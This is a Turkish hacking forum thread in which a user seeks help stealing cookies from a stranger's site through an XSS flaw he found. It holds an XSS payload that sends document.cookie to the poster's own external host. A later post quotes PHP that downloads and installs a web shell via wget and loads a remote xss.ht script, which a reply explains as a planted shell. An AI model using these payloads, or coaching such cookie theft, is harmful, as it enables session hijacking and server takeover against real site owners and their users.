Web bilgisi olan herkes konuya lütfen

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Xss açıklı bir site buldum cookiesini çekmek istedim
<script>location.href='http://hungry-sammet.20-231-41-40.plesk.page/dusencookie.php'+escape(document.cookie)</script>
Bu kodu yazdım şimdi adamın sitesine düşen girişler bana gelmiyor bana gelmediği gibi de adam txtye girince https://hungry-sammet.20-231-41-40.plesk.page/dusencookie.php?cookie=
Bu siteye atıyor adamı ve beyaz bir ekran oluyor
Yardım edin bana, adamın cookiesini xss açığından nasıl çekerim?

🔒 Bu içeriği görmek için giriş yapın

 
Olmuyor yine oluşan dosyanın ve sitenin içi beyaz
Aga XSS client tarafta çalışır biliyorsun dimi bunları?
Eğer XSS varsa bekleyeceksin hedef web appteki userın o stored xss payloadını çalıştırmasını yani şunu demek istiyorum
karşıdaki kişi kendi tarayıcısında admin paneline girmeli ki xss payload çalışssın o girmediği sürece payload çalışmaz client side çünkü

🔒 Bu içeriği görmek için giriş yapın

 
Aga XSS client tarafta çalışır biliyorsun dimi bunları?
Eğer XSS varsa bekleyeceksin hedef web appteki userın o stored xss payloadını çalıştırmasını yani şunu demek istiyorum
karşıdaki kişi kendi tarayıcısında admin paneline girmeli ki xss payload çalışssın o girmediği sürece payload çalışmaz client side çünkü
Heee anladım usta sağol

🔒 Bu içeriği görmek için giriş yapın

 
><?php $çıktı = shell_exec('wget https://www.merbamakina.com.tr/tema/genel/uploads/ik/shell.txt && mv shell.txt shell.php'); echo "<pre>$çıktı</pre>";?><script src=https://wulk4nsploix.xss.ht></script>
bu nedir peki
sistemde yazma yetkisi varsa ve yazılan dosya php ise önlem alınmadıysa sisteme shell çekilebiliri.
sistemine shell yüklenmiş kanks.

🔒 Bu içeriği görmek için giriş yapın

 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
133,768Konular
3,290,479Mesajlar
324,535Kullanıcılar
hacıfettahSon Üye
Üst Alt